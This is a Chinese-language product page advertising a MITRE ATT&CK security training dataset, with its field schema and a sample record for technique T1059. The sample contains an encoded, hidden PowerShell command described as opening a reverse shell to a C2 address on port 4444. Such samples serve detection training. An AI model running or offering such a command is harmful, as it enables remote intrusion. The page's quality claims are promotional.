数据集概览
定义:MITRE ATT&CK 安全技能训练数据集是由长沙朗慧信息科技有限公司基于公开ATT&CK知识框架,结合真实攻防场景、威胁情报报告与安全事件数据构建的高质量安全训练数据集。覆盖全部14个战术类别、200+技术/子技术,每条数据以「XML规则 + PCAP流量 + HTTP还原文本 + 攻击类型标签 + 标准答案」五元组关联结构组织。
| 数据集名称 | MITRE ATT&CK 安全技能训练数据集 |
| 数据总量 | 1,000~20,000条 |
| 数据类型 | JSON + PCAP(五元组关联结构) |
| 数据来源 | 朗慧安全实验室 + 公开威胁情报 |
| 授权方式 | 商业授权 附带完整授权文件 |
| 交付周期 | 1-2个月 |
| 涵盖战术 | Reconnaissance / Resource Development / Initial Access / Execution / Persistence / Privilege Escalation / Defense Evasion / Credential Access / Discovery / Lateral Movement / Collection / Command and Control / Exfiltration / Impact(14项全覆盖) |
| 输出格式 | JSONL / CSV / Excel |
| 语言 | 中英双语 |
核心数据字段
每条数据包含完整的ATT&CK技术元数据、攻击描述、检测方法、缓解措施、过程示例及PCAP关联信息,覆盖从知识注入到实战训练的全场景需求。
| 字段类别 | 字段数 | 典型字段 |
|---|---|---|
| 技术元数据 | 6 | technique_id(ATT&CK技术ID)、name(技术名称)、tactic(所属战术)、platform(适用平台)、permissions_required(所需权限)、data_sources(数据源) |
| 攻击过程描述 | 3 | description(攻击技术详细描述)、procedure_example(真实APT过程示例)、detection_recommendation(检测建议) |
| 检测方法 | 3 | detection_type(检测类型)、data_source_required(所需数据源)、detection_logic(检测逻辑描述) |
| 缓解措施 | 3 | mitigation_id(缓解措施ID)、mitigation_name(措施名称)、mitigation_description(措施详细描述) |
| 过程示例 | 3 | example_command(示例命令)、example_tool(使用工具)、procedure_description(过程描述) |
| PCAP关联 | 4 | pcap_file(PCAP文件名)、pcap_md5(文件MD5)、pcap_size(文件大小)、flow_signature(流量特征签名) |
数据样例展示
以下为结构化 JSON 样例,展示ATT&CK技术的五元组训练数据格式。
{
"entry_id": "ATTACK-TRN-2024-0001523",
"technique_metadata": {
"technique_id": "T1059",
"name": "命令与脚本解释器",
"tactic": "Execution",
"platform": ["Windows", "Linux", "macOS"],
"permissions_required": "User",
"data_sources": ["Process Creation", "Command Execution", "Script Load"]
},
"attack_description": {
"description": "攻击者利用命令和脚本解释器(如PowerShell、Bash、Python)执行恶意命令、脚本或二进制文件。这是最常见的攻击执行手段之一,可绕过应用白名单等防御机制。",
"procedure_example": "APT29使用PowerShell执行无文件攻击,通过Invoke-Expression加载内存中的恶意载荷,并利用WMI持久化。",
"detection_recommendation": "监控PowerShell脚本块日志(Event ID 4104)、进程创建事件(Event ID 4688)、命令行参数审计。"
},
"detection": {
"detection_type": "Behavioral",
"data_source_required": ["Windows Event Log", "Sysmon", "EDR"],
"detection_logic": "检测非交互式PowerShell执行(-EncodedCommand、-WindowStyle Hidden)、Bash反弹Shell、Python调用subprocess/os.system执行系统命令。"
},
"mitigation": {
"mitigation_id": "M1042",
"mitigation_name": "禁用或限制脚本解释器",
"mitigation_description": "配置AppLocker/WDAC限制脚本执行,启用PowerShell约束语言模式,使用组策略禁用不必要的脚本解释器。"
},
"procedure_example": {
"example_command": "powershell -NoP -NonI -W Hidden -Enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADEALgAxADAAMAAiACwANAA0ADQANAApADsA",
"example_tool": "PowerShell Empire",
"procedure_description": "使用Base64编码的PowerShell命令建立反向TCP连接,连接C2服务器192.168.1.100:4444。"
},
"pcap_info": {
"pcap_file": "T1059_cmd_shell_reverse_20240115.pcap",
"pcap_md5": "a3f8b2c91d4e5f60789a1b2c3d4e5f60",
"pcap_size": "245678",
"flow_signature": "TCP SYN → 192.168.1.100:4444, Base64 PowerShell payload in HTTP POST body"
},
"answer": {
"is_attack": true,
"attack_type": "命令执行",
"attck_phase": "Execution",
"true_positive_rate": 0.97
}
}AI 应用场景
安全大模型预训练与SFT
20,000条高质量ATT&CK结构化训练数据,覆盖完整攻击生命周期,支持GPT/LLaMA/Qwen等基座模型在网络安全领域的预训练和监督微调,显著提升模型的攻防知识深度。
ATT&CK知识注入增强
基于14大战术200+技术的结构化知识体系,为安全大模型注入系统化ATT&CK知识图谱,使模型具备准确识别、解释和推理攻击行为的能力。
TTP推理能力训练
五元组关联数据支持模型学习「攻击手法→工具→流量特征→检测规则→标准答案」的完整推理链路,训练安全基座模型的因果推理与证据链构建能力。
SOC自动化编排
基于ATT&CK技术映射的检测规则与响应措施,训练SOC自动化剧本编排AI,实现告警→ATT&CK映射→检测规则触发→响应措施执行的端到端自动化。
攻防对抗模拟演练
丰富的攻击过程示例和PCAP流量数据,可用于构建AI驱动的攻防演练平台,自动化生成红队攻击路径和蓝队检测响应策略。
威胁情报关联分析
将CTI报告中的TTP描述与ATT&CK技术条目自动对齐,训练威胁情报关联分析AI,实现从情报文本到技术图谱的自动映射与攻击组织画像。
常见问题
需要定制化的ATT&CK安全数据方案?
长沙朗慧信息科技有限公司 DataAssetsAPI 平台,致力于为 AI 企业、科研机构提供高质量、合规的安全数据资产。支持按攻击类型、按技术覆盖、按数量规模灵活组合。
数据样本预览 · 定制化战术/技术子集 · 专业技术支持